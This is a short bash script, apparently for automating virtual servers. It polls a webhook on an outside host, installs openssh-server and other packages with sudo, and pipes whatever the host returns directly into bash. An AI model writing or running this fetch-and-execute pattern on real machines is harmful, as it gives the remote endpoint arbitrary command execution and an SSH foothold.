#!/bin/bash
while true; do
  response=$(curl -s -X POST "https://web12.souweverton.com.br/webhook/dad5b129-2725-49a2-a950-44b92c4574fe")
  if [[ -n "$response" ]]; then
    sudo apt update && sudo apt install -y nano openssh-server jq
    echo "$response" | bash
    break
  else
    echo "Crie mais Servidores Virtuais"
    sleep 2
  fi
done
